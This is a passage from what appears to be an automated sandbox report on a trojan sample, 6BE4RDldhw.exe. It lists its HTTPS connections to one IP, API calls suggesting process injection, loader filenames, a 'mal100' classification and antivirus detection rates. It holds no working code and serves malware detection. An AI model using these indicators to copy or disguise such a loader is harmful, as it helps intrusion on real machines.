00000000.00000003.2521127885.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.1827529061.00000000206D1000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2176461994.00000000008BA000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2521010683.0000000000931000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000003.2345346508.000000000092B000.00000004.00000020.00020000.00000000.sdmp, 6BE4RDldhw.exe, 00000000.00000002.2597281272.000000001FAC6000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.veeble.org/contact/
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
      Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
      Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
      Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
      Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
      Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
      Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
      Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
      Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
      Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
      Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
      Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
      Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
      Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
      Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50030 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
      Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49702 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49752 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49767 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49780 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49793 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49806 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49819 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49832 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49845 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49858 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49870 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49883 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49896 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49908 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49919 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49931 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49943 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49956 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49969 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:49994 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50007 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50019 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50031 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50042 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 108.170.55.202:443 -> 192.168.2.7:50052 version: TLS 1.2
      Source: Yara matchFile source: Process Memory Space: 6BE4RDldhw.exe PID: 7796, type: MEMORYSTR
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E87D80 NtWriteVirtualMemory,0_2_02E87D80
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8DD6C RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02E8DD6C
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8DBAC RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02E8DBAC
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8DC88 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02E8DC88
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8DC00 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02E8DC00
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88D6A GetThreadContext,SetThreadContext,NtResumeThread,0_2_02E88D6A
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E88D6C GetThreadContext,SetThreadContext,NtResumeThread,0_2_02E88D6C
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E8F7C4 InetIsOffline,CoInitialize,CoUninitialize,CreateProcessAsUserW,ResumeThread,CloseHandle,CloseHandle,ExitProcess,0_2_02E8F7C4
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E720C40_2_02E720C4
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: String function: 02E744DC appears 75 times
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: String function: 02E74500 appears 33 times
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: String function: 02E74860 appears 949 times
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: String function: 02E746D4 appears 244 times
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: String function: 02E889D8 appears 45 times
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: String function: 02E88954 appears 56 times
      Source: 6BE4RDldhw.exeBinary or memory string: OriginalFilename vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000002.2598433621.000000007FA30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000002.2583380707.0000000002CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000003.1333431137.0000000002CDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000003.1333153403.000000007FC5F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000002.2582071460.0000000002415000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exe, 00000000.00000003.1333810883.000000007F8EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs 6BE4RDldhw.exe
      Source: 6BE4RDldhw.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E77FDC GetDiskFreeSpaceA,0_2_02E77FDC
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeCode function: 0_2_02E86DD0 CoCreateInstance,0_2_02E86DD0
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: 6BE4RDldhw.exeReversingLabs: Detection: 65%
      Source: 6BE4RDldhw.exeVirustotal: Detection: 67%
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeFile read: C:\Users\user\Desktop\6BE4RDldhw.exeJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: url.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: ieframe.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: netapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Users\user\Desktop\6BE4RDldhw.exeSection loaded: amsi.dllJump to behavior
